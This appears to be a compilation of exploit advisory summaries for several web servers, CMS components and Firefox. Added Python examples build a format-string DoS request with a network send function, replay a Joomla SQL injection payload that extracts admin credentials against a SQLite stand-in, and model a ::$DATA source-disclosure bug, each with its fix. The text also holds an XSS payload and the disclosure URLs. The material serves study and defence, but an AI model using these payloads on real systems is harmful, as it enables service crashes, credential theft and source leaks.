This exploit allows an attacker to read arbitrary files from a vulnerable Techlogica HTTP Server 1.03. The attacker sends a specially crafted HTTP request to the server, which responds with the contents of the requested file.
The vulnerability is present in the http://[IPLocal]/3_1 page, where an attacker can inject a malicious SSID value such as SSID=1><script>alert(1)</script>; the injected script is then executed when http://[IPLocal]/3_0 is visited.
httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header. The bug is in h_readrequest() in httpd_src/http.cpp, where the client-supplied host name is passed as the format argument: snprintf(temp[1],MAX,client->host); An attacker can send a Host header containing format directives to the vulnerable server and crash it, causing a denial of service.
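The following is an added example, not code from the advisory or from httpdx. It builds the crafted request and walks the Host value the way snprintf would interpret it, to show why a header with no matching arguments crashes the server. It assumes only what the advisory states (the Host value reaches snprintf as the format string); the payload shape, the target address and the described stack effects are illustrative, not an emulation of the server's actual stack layout.

```python
import re
import socket

# printf-style conversion specification: flags, width, precision, length, conversion
_SPEC = re.compile(r"%([-+ #0]*)(\d+|\*)?(?:\.(\d+|\*))?(hh|h|ll|l|j|z|t|L)?([diouxXeEfgGaAcspn%])")


def build_request(host, path="/"):
    """Raw HTTP/1.1 request whose Host header carries the format-string payload.
    Assumption (from the advisory): the server copies this value into snprintf's format."""
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def walk_directives(fmt):
    """Describe what snprintf does with each conversion when the Host value is the
    format string. Returns [(directive, effect), ...]; a plain host name yields []."""
    effects = []
    for m in _SPEC.finditer(fmt):
        conv = m.group(5)
        if conv == "%":
            effect = "literal percent sign"
        elif conv == "n":
            effect = "writes the byte count through a pointer taken from the stack"
        elif conv == "s":
            effect = "dereferences a pointer taken from the stack"
        elif conv in "diouxXc":
            effect = "reads an integer argument from the stack"
        else:  # eEfgGaA
            effect = "reads a floating-point argument"
        effects.append((m.group(0), effect))
    return effects


def dos_payload(count=64):
    """Constructed DoS payload: repeated %s. Each one treats another stack slot as a
    char*; with no real arguments the server soon reads an unmapped address and dies.
    No %n is needed for the denial of service the advisory describes."""
    return "%s" * count


def send(host_value, target, port=80, timeout=5):
    """Deliver the request to a live instance (placeholder target; not run offline)."""
    with socket.create_connection((target, port), timeout=timeout) as s:
        s.sendall(build_request(host_value))
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    for directive, effect in walk_directives("AAAA%08x%08x%n"):
        print(f"{directive:>6}  {effect}")
    print(build_request(dos_payload(8)).decode())
```

The fix on the server side is the usual one: pass the untrusted value as data, snprintf(temp[1], MAX, "%s", client->host), so no byte of the Host header is ever interpreted as a conversion.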
A vulnerability exists in Aurora Content Management System (Enterprise Edition) due to insufficient sanitization of user-supplied input in the 'AURORA_MODULES_FOLDER' parameter of the 'install.plugin.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious payload.
Invisible Browsing 5.0.52 is vulnerable to a buffer overflow vulnerability when handling specially crafted .ibkey files. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .ibkey file.
This exploit targets a vulnerability in the Joomla Component AlphaUserPoints. The vulnerability is a SQL injection vulnerability that allows an attacker to gain access to the admin account of the website. The exploit uses a specially crafted URL to inject a malicious SQL query into the vulnerable component. The query is then used to extract the admin username and email address from the database. The exploit also generates a token which can be used to log in as the admin.
The vulnerability exists in the 'Name' field of the Joomla Component Turtushout 0.11, which is placed into an SQL INSERT without sanitization and so allows an attacker to inject malicious SQL. The value submitted in the Name field by this exploit is: test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- (the closing quote of the original string and everything after it are swallowed by the trailing comment, and the second VALUES row stores the admin username and e-mail where the shout message would normally go).
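An added example, not code from the exploit or from the Turtushout component, that reproduces the mechanism behind the two Joomla SQL injections above (AlphaUserPoints and Turtushout) with the Turtushout payload exactly as the advisory gives it. It runs against an in-memory SQLite stand-in, so the real component's query is replaced by a constructed six-column INSERT with the Name value in the fifth position (an assumption chosen so that the payload parses as a second VALUES row), the Joomla table prefix is expanded to the Joomla 1.5 default jos_, the admin user and gid 25 are constructed, and MySQL's CONCAT and hex-string literals are shimmed for SQLite.

```python
import re
import sqlite3

# Joomla rewrites "#__" to the site's table prefix; "jos_" is the Joomla 1.5 default.
TABLE_PREFIX = "jos_"

# Constructed INSERT template (assumption: the component's real query is not on the
# page). Six columns per row, Name fifth, so the advisory's payload parses.
INSERT_TEMPLATE = (
    "INSERT INTO #__turtushout (author, msg, posted, published, name, ip) "
    "VALUES ('test', '{msg}', '{posted}', 0, '{name}', '{ip}')"
)

# The advisory's payload as the value submitted in the Name field.
PAYLOAD = (
    "test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) "
    "FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- "
)


def joomla_to_sqlite(sql):
    """Make the MySQL-flavoured SQL executable in SQLite: expand the table prefix (as
    Joomla's database layer does) and turn MySQL hex string literals such as 0x20 into
    quoted strings, because SQLite would read 0x20 as the integer 32."""
    sql = sql.replace("#__", TABLE_PREFIX)
    return re.sub(r"\b0x([0-9A-Fa-f]+)\b",
                  lambda m: "'" + bytes.fromhex(m.group(1)).decode() + "'", sql)


def fresh_db():
    """In-memory stand-in for the Joomla database with a constructed admin (gid 25)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no CONCAT(); -1 registers a variadic function
    conn.create_function("CONCAT", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.executescript(joomla_to_sqlite("""
        CREATE TABLE #__users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, gid INTEGER);
        INSERT INTO #__users VALUES (62, 'admin', 'admin@example.com', 25);
        INSERT INTO #__users VALUES (63, 'visitor', 'visitor@example.com', 18);
        CREATE TABLE #__turtushout (author TEXT, msg TEXT, posted TEXT,
                                    published INTEGER, name TEXT, ip TEXT);
    """))
    return conn


def stored_messages(conn):
    """What the shoutbox would render: the msg column of every stored row, in order."""
    return [row[0] for row in conn.execute(
        joomla_to_sqlite("SELECT msg FROM #__turtushout ORDER BY rowid"))]


def shout_vulnerable(conn, name, msg="hello"):
    """String-building the INSERT from the Name field: the bug the advisory describes."""
    sql = INSERT_TEMPLATE.format(name=name, msg=msg,
                                 posted="2009-08-07 13:52:38", ip="127.0.0.1")
    conn.execute(joomla_to_sqlite(sql))
    return stored_messages(conn)


def shout_fixed(conn, name, msg="hello"):
    """Same insert with bound parameters: the payload is stored as inert text."""
    conn.execute(joomla_to_sqlite(
        "INSERT INTO #__turtushout (author, msg, posted, published, name, ip) "
        "VALUES ('test', ?, ?, 0, ?, ?)"),
        (msg, "2009-08-07 13:52:38", name, "127.0.0.1"))
    return stored_messages(conn)


if __name__ == "__main__":
    print("vulnerable:", shout_vulnerable(fresh_db(), PAYLOAD))
    print("fixed:     ", shout_fixed(fresh_db(), PAYLOAD))
```

With the vulnerable path the second VALUES row lands in the shout table with the admin's username and e-mail as its message, which the shoutbox then displays to the attacker; with bound parameters the same submission is just an odd-looking name.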
In August 2009, ZDI disclosed a few details regarding a couple of interesting vulnerabilities within the Oracle Backup Admin server. Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart authentication bypass and a trivial command injection, resulting in arbitrary command execution.
Firefox up through 3.0.13 had an obscure little function under window.pkcs11: long addmodule(in DOMString moduleName, in DOMString libraryFullPath, in long cryptoMechanismFlags, in long cipherFlags). The attacker doesn't get a zero-click install -- there's a dialog -- but: 1) the attacker does get to customize the dialog via moduleName; 2) the dialog is modal, so the user doesn't get access to Firefox again until they hit OK (they can't even close Firefox); 3) on Windows, he can put a UNC path in for the library path. There's probably something similar on OS X and some Linux distros. Even without it, there's usually a way to get a file into a known location -- see John Heasman's Java work. LoadLibrary of the attacker's library happens on OK.
Kolibri+ 2 Web Server is a Windows-based HTTP server. This is the latest version of the application available. This vulnerability is similar to the one reported earlier by Skull-HacKeR. Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure (download, in this case) by appending the NTFS default data stream name to the requested file:
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/default.asp::$DATA
http://172.16.2.101/index.php::$DATA
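An added example, not Kolibri+ code, that models why the ::$DATA suffix discloses source: the server picks a handler from the file extension of the raw request name, while NTFS opens file::$DATA as the unnamed data stream of file, i.e. the same bytes as the file itself. The handler table, the dispatch logic and the stream parsing are constructed assumptions about the general bug class, not Kolibri's implementation, and the NTFS behaviour is modelled rather than exercised so the code runs on any platform.

```python
import posixpath

# Constructed handler table: anything without a listed extension is served as a static file.
SCRIPT_HANDLERS = {".asp": "asp-engine", ".php": "php-engine"}


def split_stream(name):
    """Model of NTFS name syntax 'file:stream:type'. 'file::$DATA' is the unnamed
    (default) data stream of 'file', so opening it yields the file's own bytes.
    Returns (base, stream_name, stream_type); stream fields are None when absent."""
    base, sep, rest = name.partition(":")
    if not sep:
        return base, None, None
    stream, _, stype = rest.partition(":")
    return base, stream, stype or "$DATA"


def dispatch_vulnerable(url_path):
    """Dispatch the way the advisory implies: the extension lookup sees the raw request
    name, the file open sees what NTFS resolves. Returns (handler, file_opened)."""
    name = posixpath.basename(url_path)
    ext = posixpath.splitext(name)[1]          # '.asp::$DATA' for 'default.asp::$DATA'
    handler = SCRIPT_HANDLERS.get(ext, "static")   # unknown extension -> raw bytes
    base, _stream, _stype = split_stream(name)     # NTFS opens default.asp
    return handler, base


def dispatch_fixed(url_path):
    """Reject alternate-stream syntax before the extension lookup (':' is never legal
    in a Windows file name), so the two views of the name cannot diverge."""
    name = posixpath.basename(url_path)
    if ":" in name:
        return "reject", None
    ext = posixpath.splitext(name)[1]
    return SCRIPT_HANDLERS.get(ext, "static"), name


if __name__ == "__main__":
    for path in ("/default.asp", "/default.asp::$DATA", "/index.php::$DATA"):
        print(f"{path:24} vulnerable={dispatch_vulnerable(path)}  fixed={dispatch_fixed(path)}")
```

The same mismatch explains the older IIS ::$DATA disclosure: the script engine never sees the request, and the static handler hands back the unexecuted source.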